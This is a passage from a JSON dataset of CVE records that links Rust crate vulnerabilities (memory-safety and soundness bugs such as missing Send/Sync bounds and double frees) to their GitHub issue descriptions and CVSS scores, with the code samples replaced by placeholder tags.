  86359. "exploitabilityScore": 3.9
  86360. },
  86361. {
  86362. "CVE_ID": "CVE-2020-35901",
  86363. "Issue_Url_old": "https://github.com/actix/actix-web/issues/1321",
  86364. "Issue_Url_new": "https://github.com/actix/actix-web/issues/1321",
  86365. "Repo_new": "actix/actix-web",
  86366. "Issue_Created_At": "2020-01-24T19:02:37Z",
  86367. "description": "Undefined behavior due to unsafe pinning of APITAG Expected Behavior The program below should not segfault when I only write 'safe' code. Current Behavior The program below segfaults. Possible Solution Change the APITAG trait to take a APITAG instead of a APITAG . Steps to Reproduce (for bugs) Run the following code in debug mode. ERRORTAG Context I found this problem by searching for 'unsafe' in the actix web repo. Rust Version (I.e, output of APITAG ): rustc NUMBERTAG nightly Actix Web Version: actix http NUMBERTAG",
  86368. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
  86369. "severity": "HIGH",
  86370. "baseScore": 7.5,
  86371. "impactScore": 3.6,
  86372. "exploitabilityScore": 3.9
  86373. },
  86374. {
  86375. "CVE_ID": "CVE-2020-36441",
  86376. "Issue_Url_old": "https://github.com/SonicFrog/abox/issues/1",
  86377. "Issue_Url_new": "https://github.com/sonicfrog/abox/issues/1",
  86378. "Repo_new": "sonicfrog/abox",
  86379. "Issue_Created_At": "2020-11-10T19:39:29Z",
  86380. "description": "APITAG should have bounds on its APITAG traits. Currently APITAG implements the APITAG traits unconditionally: URLTAG I think this should only be when APITAG and APITAG respectively. Otherwise, this makes it possible to send across types that aren't safe to use across threads such as Cell s. Here's a demonstration that causes a data race: ERRORTAG This outputs: APITAG APITAG found by APITAG gatech's Rust group)",
  86381. "vectorString": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H",
  86382. "severity": "HIGH",
  86383. "baseScore": 8.1,
  86384. "impactScore": 5.9,
  86385. "exploitabilityScore": 2.2
  86386. },
  86387. {
  86388. "CVE_ID": "CVE-2020-36437",
  86389. "Issue_Url_old": "https://github.com/longshorej/conqueue/issues/9",
  86390. "Issue_Url_new": "https://github.com/longshorej/conqueue/issues/9",
  86391. "Repo_new": "longshorej/conqueue",
  86392. "Issue_Created_At": "2020-11-24T19:46:07Z",
  86393. "description": "APITAG Send trait and Sync trait should have bounds. Hi there, we APITAG group APITAG gatech) are scanning crates on crates.io for potential soundness bugs. We noticed that the APITAG object implements the Send and Sync traits for all types: URLTAG However, this should probably be bounded by T: Sync and T: Send. Otherwise, it's possible to smuggle non Send types across thread boundaries or share non Sync types across thread boundaries. Here's an example of a data race in safe Rust code through a APITAG . ERRORTAG",
  86394. "vectorString": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H",
  86395. "severity": "HIGH",
  86396. "baseScore": 8.1,
  86397. "impactScore": 5.9,
  86398. "exploitabilityScore": 2.2
  86399. },
  86400. {
  86401. "CVE_ID": "CVE-2020-35876",
  86402. "Issue_Url_old": "https://github.com/spacejam/rio/issues/11",
  86403. "Issue_Url_new": "https://github.com/spacejam/rio/issues/11",
  86404. "Repo_new": "spacejam/rio",
  86405. "Issue_Created_At": "2020-02-07T10:19:46Z",
  86406. "description": "mem::forget(completion) unsafety? . It seems to me that the soundness of Completion relies on the fact that it waits for the operation to complete in its Drop impl. But per the leakpocalypse it's safe to just forget the completion, side stepping that?",
  86407. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
  86408. "severity": "CRITICAL",
  86409. "baseScore": 9.8,
  86410. "impactScore": 5.9,
  86411. "exploitabilityScore": 3.9
  86412. },
  86413. {
  86414. "CVE_ID": "CVE-2020-36463",
  86415. "Issue_Url_old": "https://github.com/schets/multiqueue/issues/31",
  86416. "Issue_Url_new": "https://github.com/schets/multiqueue/issues/31",
  86417. "Repo_new": "schets/multiqueue",
  86418. "Issue_Created_At": "2020-12-26T01:55:23Z",
  86419. "description": "Queues allow non Send types to be sent to other threads, allowing data races. Hello :crab: , I recently submitted a bug report to the FILETAG crate which is maintained from a fork of this crate. The bug was fixed a few days ago in version NUMBERTAG The exact same bug exists for the multiqueue crate as well. FYI, I'll leave a link to the bug report that I submitted for the APITAG crate: URLTAG Thank you for checking out this issue NUMBERTAG",
  86420. "vectorString": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H",
  86421. "severity": "HIGH",
  86422. "baseScore": 8.1,
  86423. "impactScore": 5.9,
  86424. "exploitabilityScore": 2.2
  86425. },
  86426. {
  86427. "CVE_ID": "CVE-2020-35921",
  86428. "Issue_Url_old": "https://github.com/yoshuawuyts/miow/issues/38",
  86429. "Issue_Url_new": "https://github.com/yoshuawuyts/miow/issues/38",
  86430. "Repo_new": "yoshuawuyts/miow",
  86431. "Issue_Created_At": "2020-11-13T22:59:52Z",
  86432. "description": "Invalidly assumes the memory layout of APITAG miow assumes that the memory layout of APITAG matches APITAG , but this can't be assumed. std makes no such promise to the outside world. The offending code is here: URLTAG Some other crates made the same assumptions, and they are being fixed in URLTAG URLTAG and URLTAG Until this is fixed and published it kind of blocks moving these fundamental network types into core and also stops them from having const fn constructors. See this PR on std for reference: URLTAG",
  86433. "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H",
  86434. "severity": "MEDIUM",
  86435. "baseScore": 5.5,
  86436. "impactScore": 3.6,
  86437. "exploitabilityScore": 1.8
  86438. },
  86439. {
  86440. "CVE_ID": "CVE-2020-35920",
  86441. "Issue_Url_old": "https://github.com/rust-lang/socket2-rs/issues/119",
  86442. "Issue_Url_new": "https://github.com/rust-lang/socket2/issues/119",
  86443. "Repo_new": "rust-lang/socket2",
  86444. "Issue_Created_At": "2020-11-06T07:44:14Z",
  86445. "description": "The code invalidly assumes the memory layout of APITAG This library casts APITAG (and APITAG ) into APITAG : URLTAG As far as I can tell there are no guarantees from std about the layout of APITAG , and this code could silently compile and cause UB elsewhere if the representation changes. This internals forum thread is where this discussion started: URLTAG mio does the same kind of invalid casting: URLTAG",
  86446. "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H",
  86447. "severity": "MEDIUM",
  86448. "baseScore": 5.5,
  86449. "impactScore": 3.6,
  86450. "exploitabilityScore": 1.8
  86451. },
  86452. {
  86453. "CVE_ID": "CVE-2020-35928",
  86454. "Issue_Url_old": "https://github.com/kanidm/concread/issues/48",
  86455. "Issue_Url_new": "https://github.com/kanidm/concread/issues/48",
  86456. "Repo_new": "kanidm/concread",
  86457. "Issue_Created_At": "2020-11-13T22:24:55Z",
  86458. "description": "APITAG bound needed on V in APITAG . Hello! :crab: While scanning APITAG we APITAG group APITAG gatech) have noticed a soundness/memory safety issue in this crate which allows safe Rust code to trigger undefined behavior. Issue Currently Send & Sync for APITAG is implemented as below. ERRORTAG In the Send impl, there is no Send bound on V . In the Sync impl, there is no Sync bound on V . It is possible to insert a non Sync item to APITAG and share it across multiple threads. Proof of Concept I wrote a minimal proof of concept that exploits this issue to cause undefined behavior in safe Rust. To observe undefined behavior, you need to run the below program in Debug mode. In the program below, multiple threads clone & drop Rc ( neither Send nor Sync ) which is inside APITAG . Since Rc 's internal APITAG is updated by multiple threads without synchronization, the program will terminate in either one of the following states. APITAG NUMBERTAG program panics at the assertion check at the end (memory leak) APITAG NUMBERTAG Rc is dropped while references to it are still alive. When run on Ubuntu NUMBERTAG program crashes with error: APITAG APITAG NUMBERTAG Not impossible, but highly unlikely ERRORTAG How to fix the issue? I think this issue can be solved by adding APITAG bounds to the current APITAG impls as below. ERRORTAG Thank you for checking out this issue NUMBERTAG cat:",
  86459. "vectorString": "CVSS:3.1/AV:L/AC:H/PR:L/UI:N/S:U/C:N/I:N/A:H",
  86460. "severity": "MEDIUM",
  86461. "baseScore": 4.7,
  86462. "impactScore": 3.6,
  86463. "exploitabilityScore": 1.0
  86464. },
  86465. {
  86466. "CVE_ID": "CVE-2020-35900",
  86467. "Issue_Url_old": "https://github.com/raviqqe/array-queue/issues/2",
  86468. "Issue_Url_new": "https://github.com/raviqqe/array-queue/issues/2",
  86469. "Repo_new": "raviqqe/array-queue",
  86470. "Issue_Created_At": "2020-09-26T07:44:59Z",
  86471. "description": "array_queue pop_back should be indexed with index method.. In the APITAG function, APITAG is used as the index: URLTAG This means that after you perform a APITAG there is the potential to read from uninitialized or previously dropped memory. This can lead to a double drop and an arbitrary read primitive from safe rust. Here's a program that exhibits the read behavior: ERRORTAG The second part is a bit harder to fix. Rust now has a type called ERRORTAG that is used to safely initialize types in uninitialized memory. I'd recommend at least fixing the index problem in APITAG .",
  86472. "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N",
  86473. "severity": "MEDIUM",
  86474. "baseScore": 5.5,
  86475. "impactScore": 3.6,
  86476. "exploitabilityScore": 1.8
  86477. },
  86478. {
  86479. "CVE_ID": "CVE-2020-36219",
  86480. "Issue_Url_old": "https://github.com/reem/rust-atomic-option/issues/4",
  86481. "Issue_Url_new": "https://github.com/reem/rust-atomic-option/issues/4",
  86482. "Repo_new": "reem/rust-atomic-option",
  86483. "Issue_Created_At": "2020-10-31T20:00:59Z",
  86484. "description": "APITAG should have Sync bound on its type argument.. Currently APITAG implements Sync for any type. However, this should really be bounded by APITAG , otherwise it allows for types that were never meant to be used across threads to be smuggled across boundaries. APITAG found by APITAG See this example of using APITAG to use a Cell across thread boundaries, leading to an arbitrary pointer dereference: ERRORTAG Output: APITAG Return Code NUMBERTAG SIGSEGV)",
  86485. "vectorString": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:N/I:N/A:H",
  86486. "severity": "MEDIUM",
  86487. "baseScore": 5.9,
  86488. "impactScore": 3.6,
  86489. "exploitabilityScore": 2.2
  86490. },
  86491. {
  86492. "CVE_ID": "CVE-2021-29935",
  86493. "Issue_Url_old": "https://github.com/SergioBenitez/Rocket/issues/1534",
  86494. "Issue_Url_new": "https://github.com/sergiobenitez/rocket/issues/1534",
  86495. "Repo_new": "sergiobenitez/rocket",
  86496. "Issue_Created_At": "2021-02-09T22:35:40Z",
  86497. "description": "Unsafe code in Formatter is not panic safe. Hello, we APITAG group APITAG gatech) found a memory safety/soundness issue in this crate while scanning Rust code on crates.io for potential vulnerabilities. Issue Description URLTAG APITAG method converts APITAG to APITAG with the justification above. Unfortunately, the prefix is not popped if line NUMBERTAG panics. In such case, the transmuted APITAG persists in prefixes field and will lead to use after free if the formatter is accessed again. Reproduction Below is an example program that demonstrates use after free using safe APIs of APITAG . APITAG Detail APITAG APITAG The program is expected to write APITAG . However, due to the aforementioned use after free, it prints APITAG instead. ERRORTAG Output: CODETAG Tested Environment Crate: rocket_http Version NUMBERTAG OS: Ubuntu NUMBERTAG LTS Rustc version: rustc NUMBERTAG nightly NUMBERTAG caa NUMBERTAG d NUMBERTAG APITAG APITAG",
  86498. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:L",
  86499. "severity": "HIGH",
  86500. "baseScore": 7.3,
  86501. "impactScore": 3.4,
  86502. "exploitabilityScore": 3.9
  86503. },
  86504. {
  86505. "CVE_ID": "CVE-2020-36445",
  86506. "Issue_Url_old": "https://github.com/krl/convec/issues/2",
  86507. "Issue_Url_new": "https://github.com/krl/convec/issues/2",
  86508. "Repo_new": "krl/convec",
  86509. "Issue_Created_At": "2020-11-24T18:41:35Z",
  86510. "description": "APITAG lacks a bound on its Send trait and Sync trait. Hi there, we APITAG group APITAG gatech) are scanning crates on crates.io for potential soundness bugs. We noticed that the APITAG object implements the Send and Sync traits for all types: URLTAG This allows objects like Cell that doesn't implement Sync to be shared across threads leading to undefined behavior. The code below crashes due to the data race. ERRORTAG",
  86511. "vectorString": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H",
  86512. "severity": "HIGH",
  86513. "baseScore": 8.1,
  86514. "impactScore": 5.9,
  86515. "exploitabilityScore": 2.2
  86516. },
  86517. {
  86518. "CVE_ID": "CVE-2021-26953",
  86519. "Issue_Url_old": "https://github.com/bodoni/postscript/issues/1",
  86520. "Issue_Url_new": "https://github.com/bodoni/postscript/issues/1",
  86521. "Repo_new": "bodoni/postscript",
  86522. "Issue_Created_At": "2021-01-31T01:10:10Z",
  86523. "description": "Read on uninitialized buffer may cause UB ( APITAG ). Hello fellow :crab:, we APITAG group APITAG gatech) found a memory safety/soundness issue in this crate while scanning Rust code on crates.io for potential vulnerabilities. Issue Description URLTAG APITAG method creates an uninitialized buffer and passes it to user provided Read implementation. This is unsound, because it allows safe Rust code to exhibit an undefined behavior (read from uninitialized memory). FILETAG from the Read trait documentation explains the issue: > It is your responsibility to make sure that buf is initialized before calling read . Calling read with an uninitialized buf (of the kind one obtains via ERRORTAG ) is not safe, and can lead to undefined behavior. How to fix the issue? The Naive & safe way to fix the issue is to always zero initialize a buffer before lending it to a user provided Read implementation. Note that this approach will add runtime performance overhead of zero initializing the buffer. As of Jan NUMBERTAG there is not yet an ideal fix that works in stable Rust with no performance overhead. Below are links to relevant discussions & suggestions for the fix. Well written document regarding the issue URLTAG Rust RFC NUMBERTAG URLTAG FILETAG Discussion in Rust Internals Forum URLTAG",
  86524. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N",
  86525. "severity": "HIGH",
  86526. "baseScore": 7.5,
  86527. "impactScore": 3.6,
  86528. "exploitabilityScore": 3.9
  86529. },
  86530. {
  86531. "CVE_ID": "CVE-2020-36460",
  86532. "Issue_Url_old": "https://github.com/spacejam/model/issues/3",
  86533. "Issue_Url_new": "https://github.com/spacejam/model/issues/3",
  86534. "Repo_new": "spacejam/model",
  86535. "Issue_Created_At": "2020-11-10T19:58:34Z",
  86536. "description": "Possible soundness issue in Shared?. Hi there, we (the Rust group at APITAG gatech) are auditing crates on crates.io for safety issues and noticed that the Shared object seems to not have bounds on its Send / Sync traits: URLTAG We weren't sure if this was intentional since this is a testing library but this can be used to create data races from safe Rust by sharing types like Cell : ERRORTAG which outputs: APITAG",
  86537. "vectorString": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H",
  86538. "severity": "HIGH",
  86539. "baseScore": 8.1,
  86540. "impactScore": 5.9,
  86541. "exploitabilityScore": 2.2
  86542. },
  86543. {
  86544. "CVE_ID": "CVE-2020-35864",
  86545. "Issue_Url_old": "https://github.com/google/flatbuffers/issues/5825",
  86546. "Issue_Url_new": "https://github.com/google/flatbuffers/issues/5825",
  86547. "Repo_new": "google/flatbuffers",
  86548. "Issue_Created_At": "2020-03-20T16:51:02Z",
  86549. "description": "Rust: read_scalar(_at) is unsound. The APITAG and APITAG functions are unsound because the allow to do things such as: APITAG or CODETAG or even worse: CODETAG (this last one causes a segmentation fault) APITAG is behaving similar to transmute , leading to undefined behavior for types where not all bit patterns are valid (such as bool or APITAG ) or allowing to create dangling pointers. I suggest three breaking solutions: Make APITAG and APITAG functions unsafe. Make the APITAG trait unsafe. Make the APITAG trait something like: APITAG which, for example, would be implemented for APITAG like this: CODETAG This last solution, even though it is the most disrupting one, has the advantage of not requiring any ERRORTAG at all.",
  86550. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
  86551. "severity": "HIGH",
  86552. "baseScore": 7.5,
  86553. "impactScore": 3.6,
  86554. "exploitabilityScore": 3.9
  86555. },
  86556. {
  86557. "CVE_ID": "CVE-2020-36435",
  86558. "Issue_Url_old": "https://github.com/RusPiRo/ruspiro-singleton/issues/10",
  86559. "Issue_Url_new": "https://github.com/ruspiro/ruspiro-singleton/issues/10",
  86560. "Repo_new": "ruspiro/ruspiro-singleton",
  86561. "Issue_Created_At": "2020-11-16T16:57:41Z",
  86562. "description": "Singleton needs bounds on its APITAG traits. Hi there, we APITAG group APITAG gatech) are scanning crates on crates.io for potential soundness bugs. We noticed that Singleton implements Send and Sync unconiditionally: URLTAG This is guarded by a APITAG but violates APITAG 's own assumptions that Send will have APITAG and Sync will be APITAG . The way this is structured right now allows for data races from safe Rust code, for example: ERRORTAG This outputs: APITAG",
  86563. "vectorString": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H",
  86564. "severity": "HIGH",
  86565. "baseScore": 8.1,
  86566. "impactScore": 5.9,
  86567. "exploitabilityScore": 2.2
  86568. },
  86569. {
  86570. "CVE_ID": "CVE-2020-36453",
  86571. "Issue_Url_old": "https://github.com/rossdylan/rust-scottqueue/issues/1",
  86572. "Issue_Url_new": "https://github.com/rossdylan/rust-scottqueue/issues/1",
  86573. "Repo_new": "rossdylan/rust-scottqueue",
  86574. "Issue_Created_At": "2020-11-15T08:47:30Z",
  86575. "description": "Queue APITAG should have a Send bound on its APITAG traits. Hi there, we APITAG group APITAG gatech) are scanning crates on crates.io for potential soundness bugs. We noticed that the Queue object implements Send and Sync unconiditionally: URLTAG However, this should probably be bounded by APITAG in both, otherwise it allows sending types that should never be sent across threads such as Rc or references to cells. You can see an example of such a data race with cells below: ERRORTAG This outputs: APITAG",
  86576. "vectorString": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H",
  86577. "severity": "HIGH",
  86578. "baseScore": 8.1,
  86579. "impactScore": 5.9,
  86580. "exploitabilityScore": 2.2
  86581. },
  86582. {
  86583. "CVE_ID": "CVE-2021-25906",
  86584. "Issue_Url_old": "https://github.com/liebharc/basic_dsp/issues/47",
  86585. "Issue_Url_new": "https://github.com/liebharc/basic_dsp/issues/47",
  86586. "Repo_new": "liebharc/basic_dsp",
  86587. "Issue_Created_At": "2021-01-11T02:06:52Z",
  86588. "description": "panic safety issue in APITAG . Hello :crab: , we APITAG group APITAG gatech) found a memory safety/soundness issue in this crate while scanning Rust code on crates.io for potential vulnerabilities. Issue Description The issue is relevant to implementation of APITAG trait for APITAG , APITAG , and APITAG . URLTAG URLTAG If a panic happens within conversion , item( S ) within self can be dropped twice since the ownership of the item within self is duplicated with APITAG . Suggested Fix By keeping self within APITAG instead of using APITAG , it is possible to guard against such double drop bugs. I will immediately submit a PR containing the suggested fix. Thank you for checking out this issue NUMBERTAG",
  86589. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
  86590. "severity": "HIGH",
  86591. "baseScore": 7.5,
  86592. "impactScore": 3.6,
  86593. "exploitabilityScore": 3.9
  86594. },
  86595. {
  86596. "CVE_ID": "CVE-2020-35860",
  86597. "Issue_Url_old": "https://github.com/TomBebbington/cbox-rs/issues/2",
  86598. "Issue_Url_new": "https://github.com/tombebbington/cbox-rs/issues/2",
  86599. "Repo_new": "tombebbington/cbox-rs",
  86600. "Issue_Created_At": "2020-03-06T17:16:52Z",
  86601. "description": "Soundness bug. Getting a segmentation fault is as easy as: APITAG",
  86602. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
  86603. "severity": "CRITICAL",
  86604. "baseScore": 9.8,
  86605. "impactScore": 5.9,
  86606. "exploitabilityScore": 3.9
  86607. },
  86608. {
  86609. "CVE_ID": "CVE-2020-35924",
  86610. "Issue_Url_old": "https://github.com/mpdn/try-mutex/issues/2",
  86611. "Issue_Url_new": "https://github.com/mpdn/try-mutex/issues/2",
  86612. "Repo_new": "mpdn/try-mutex",
  86613. "Issue_Created_At": "2020-11-16T19:18:09Z",
  86614. "description": "APITAG should have Send bound on T. Hi there, we APITAG group APITAG gatech) are scanning crates on crates.io for potential soundness bugs. We noticed that APITAG implements Sync for all types T : URLTAG This should probably be bounded by APITAG just like the standard library's Mutex URLTAG , otherwise it allows smuggling non Send types like Rc across thread boundaries like so: ERRORTAG This outputs: APITAG and can lead to data races from safe Rust code.",
  86615. "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H",
  86616. "severity": "MEDIUM",
  86617. "baseScore": 5.5,
  86618. "impactScore": 3.6,
  86619. "exploitabilityScore": 1.8
  86620. },
  86621. {
  86622. "CVE_ID": "CVE-2020-36470",
  86623. "Issue_Url_old": "https://github.com/sklose/disrustor/issues/1",
  86624. "Issue_Url_new": "https://github.com/sklose/disrustor/issues/1",
  86625. "Repo_new": "sklose/disrustor",
  86626. "Issue_Created_At": "2020-12-18T03:45:39Z",
  86627. "description": "APITAG allows sending Non Send types across threads. Hello fellow Rustacean, we APITAG group APITAG gatech) are scanning Rust code on crates.io for potential memory safety and soundness bugs and found an issue in this crate which allows safe Rust code to exhibit an undefined behavior. Issue Description URLTAG APITAG implements APITAG regardless of whether the internal type implements APITAG This allows users to send a non Send type across threads with APITAG . APITAG 's APITAG should probably have a trait bound on the internal type T , or if APITAG needs to implement APITAG and it is not meant to be created by the end user, APITAG should be hidden with APITAG or so. Reproduction Below is an example program that sends Non Send type across threads using safe APIs of disrustor . APITAG Detail APITAG APITAG This example just shows that non Send type is sent across the thread, but it is possible to demonstrate a data race with a more complicated example. ERRORTAG Output: ERRORTAG Tested Environment Crate: disrustor Version NUMBERTAG OS: Ubuntu NUMBERTAG LTS Rustc version: rustc NUMBERTAG eac NUMBERTAG abb NUMBERTAG rd party dependencies: APITAG APITAG APITAG",
  86628. "vectorString": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:N/I:N/A:H",
  86629. "severity": "MEDIUM",
  86630. "baseScore": 5.9,
  86631. "impactScore": 3.6,
  86632. "exploitabilityScore": 2.2
  86633. },
  86634. {
  86635. "CVE_ID": "CVE-2021-45711",
  86636. "Issue_Url_old": "https://github.com/acw/simple_asn1/issues/27",
  86637. "Issue_Url_new": "https://github.com/acw/simple_asn1/issues/27",
  86638. "Repo_new": "acw/simple_asn1",
  86639. "Issue_Created_At": "2021-11-14T14:37:35Z",
  86640. "description": "Panic when decoding an invalid APITAG Hello, I hope this is the right place to report this; I didn't find any documentation for a preferred method for reporting security issues. The following code panics when trying to parse an invalid APITAG object: CODETAG The panic occurs because of these line in lib.rs: APITAG If the string is constructed in such a way that the first two bytes do not end on a character boundary, the slide operation will panic. Found by fuzzing a downstream library. I'll submit a patch ASAP.",
  86641. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
  86642. "severity": "HIGH",
  86643. "baseScore": 7.5,
  86644. "impactScore": 3.6,
  86645. "exploitabilityScore": 3.9
  86646. },
  86647. {
  86648. "CVE_ID": "CVE-2020-35916",
  86649. "Issue_Url_old": "https://github.com/image-rs/image/issues/1357",
  86650. "Issue_Url_new": "https://github.com/image-rs/image/issues/1357",
  86651. "Repo_new": "image-rs/image",
  86652. "Issue_Created_At": "2020-11-12T11:39:33Z",
  86653. "description": "Undefined behavior detected by miri. I just discovered an UB whilst testing another project with miri. APITAG and APITAG perform an invalid unsafe cast, which is detected by miri. Expected APITAG should not raise any problem. Actual behaviour APITAG triggers UB. Reproduction steps Just run miri on tests :relaxed:",
  86654. "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H",
  86655. "severity": "MEDIUM",
  86656. "baseScore": 5.5,
  86657. "impactScore": 3.6,
  86658. "exploitabilityScore": 1.8
  86659. },
  86660. {
  86661. "CVE_ID": "CVE-2018-20991",
  86662. "Issue_Url_old": "https://github.com/servo/rust-smallvec/issues/96",
  86663. "Issue_Url_new": "https://github.com/servo/rust-smallvec/issues/96",
  86664. "Repo_new": "servo/rust-smallvec",
  86665. "Issue_Created_At": "2018-05-17T15:33:23Z",
  86666. "description": "APITAG is unsound. Gist here URLTAG . A solution to this would be to set APITAG before iterating. Obviously this would cause leaks but we're already leaking data.",
  86667. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
  86668. "severity": "CRITICAL",
  86669. "baseScore": 9.8,
  86670. "impactScore": 5.9,
  86671. "exploitabilityScore": 3.9
  86672. },
  86673. {
  86674. "CVE_ID": "CVE-2021-31996",
  86675. "Issue_Url_old": "https://github.com/AbrarNitk/algorithmica/issues/1",
  86676. "Issue_Url_new": "https://github.com/abrarnitk/algorithmica/issues/1",
  86677. "Repo_new": "abrarnitk/algorithmica",
  86678. "Issue_Created_At": "2021-03-07T14:46:16Z",
  86679. "description": "APITAG crashes with double free for APITAG . Hello, we APITAG group APITAG gatech) found a memory safety/soundness issue in this crate while scanning Rust code on crates.io for potential vulnerabilities. Issue Description The implementation of APITAG freely duplicates ownership of items from list , and invokes drop of the duplicated items via APITAG . Also, panic within APITAG can also trigger double free of items whose ownership was duplicated via APITAG . URLTAG Reproduction Below is an example program that exhibits undefined behavior using safe APIs of algorithmica . Simply calling APITAG on an array of APITAG triggers double free. APITAG Detail APITAG APITAG ERRORTAG Output: APITAG Tested Environment Crate: algorithmica Version NUMBERTAG OS: Ubuntu NUMBERTAG LTS Rustc version: rustc NUMBERTAG cb NUMBERTAG ad5db NUMBERTAG APITAG APITAG",
  86680. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
  86681. "severity": "HIGH",
  86682. "baseScore": 7.5,
  86683. "impactScore": 3.6,
  86684. "exploitabilityScore": 3.9
  86685. },
  86686. {
  86687. "CVE_ID": "CVE-2021-29933",
  86688. "Issue_Url_old": "https://github.com/rphmeier/insert_many/issues/1",
  86689. "Issue_Url_new": "https://github.com/rphmeier/insert_many/issues/1",
  86690. "Repo_new": "rphmeier/insert_many",
  86691. "Issue_Created_At": "2021-01-26T22:19:07Z",
  86692. "description": "insert_many can double free items if the iterator panics. Hi there, we APITAG group APITAG gatech) are scanning crates on crates.io for potential soundness bugs. We noticed a potential issue in the provided APITAG implementation / APITAG macro. Namely, APITAG pushes elements over for insertion using APITAG here: URLTAG This can duplicate items in the Vec, after which it calls APITAG , which can potentially panic. This means that during this panic the copied elements can be dropped twice. Here's a quick example of this issue: ERRORTAG This outputs: CODETAG What's happening here is: v = APITAG , length NUMBERTAG Insert many called. v = APITAG , length NUMBERTAG APITAG v = APITAG , length NUMBERTAG APITAG panics APITAG gets dropped twice. We'd recommend wrapping the vector in FILETAG while performing these operations to avoid this issue.",
  86693. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
  86694. "severity": "HIGH",
  86695. "baseScore": 7.5,
  86696. "impactScore": 3.6,
  86697. "exploitabilityScore": 3.9
  86698. },
  86699. {
  86700. "CVE_ID": "CVE-2021-31919",
  86701. "Issue_Url_old": "https://github.com/djkoloski/rkyv/issues/113",
  86702. "Issue_Url_new": "https://github.com/rkyv/rkyv/issues/113",
  86703. "Repo_new": "rkyv/rkyv",
  86704. "Issue_Created_At": "2021-04-29T02:34:47Z",
  86705. "description": "Archives may contain uninitialized memory. During serialization, struct padding bytes and unused enum bytes may not be initialized. These bytes may be written to disk or sent over unsecured channels. This issue has been fixed as of NUMBERTAG",
  86706. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N",
  86707. "severity": "HIGH",
  86708. "baseScore": 7.5,
  86709. "impactScore": 3.6,
  86710. "exploitabilityScore": 3.9
  86711. },
  86712. {
  86713. "CVE_ID": "CVE-2020-36434",
  86714. "Issue_Url_old": "https://github.com/FillZpp/sys-info-rs/issues/63",
  86715. "Issue_Url_new": "https://github.com/fillzpp/sys-info-rs/issues/63",
  86716. "Repo_new": "fillzpp/sys-info-rs",
  86717. "Issue_Created_At": "2020-06-01T03:05:07Z",
  86718. "description": "Disk Info is not Thread Safe. I've seen a few segmentation faults when running APITAG on linux. If you call APITAG from multiple threads at once this can core dump: CODETAG There is a global APITAG : URLTAG Which, if two threads are calling APITAG the APITAG call at the end of the APITAG function will both try and free at the same time: URLTAG This results in segfaults & also double frees",
  86719. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
  86720. "severity": "CRITICAL",
  86721. "baseScore": 9.8,
  86722. "impactScore": 5.9,
  86723. "exploitabilityScore": 3.9
  86724. },
  86725. {
  86726. "CVE_ID": "CVE-2021-45710",
  86727. "Issue_Url_old": "https://github.com/tokio-rs/tokio/issues/4225",
  86728. "Issue_Url_new": "https://github.com/tokio-rs/tokio/issues/4225",
  86729. "Repo_new": "tokio-rs/tokio",
  86730. "Issue_Created_At": "2021-11-12T01:00:56Z",
  86731. "description": "Race leads to panic in APITAG . Version Reproduced with tokio NUMBERTAG and NUMBERTAG Platform APITAG Description There is a race between APITAG , APITAG , and APITAG . The following program yields a panic roughly every NUMBERTAG seconds on my NUMBERTAG c NUMBERTAG t workstation, compiled with Rust NUMBERTAG in release mode: CODETAG All of the panics occur when APITAG attempts ERRORTAG . For example: ERRORTAG I suspect this is a race where the APITAG happens between the APITAG check and the ERRORTAG .",
  86732. "vectorString": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H",
  86733. "severity": "HIGH",
  86734. "baseScore": 8.1,
  86735. "impactScore": 5.9,
  86736. "exploitabilityScore": 2.2
  86737. },
  86738. {
  86739. "CVE_ID": "CVE-2020-35896",
  86740. "Issue_Url_old": "https://github.com/housleyjk/ws-rs/issues/291",
  86741. "Issue_Url_new": "https://github.com/housleyjk/ws-rs/issues/291",
  86742. "Repo_new": "housleyjk/ws-rs",
  86743. "Issue_Created_At": "2019-09-04T17:04:34Z",
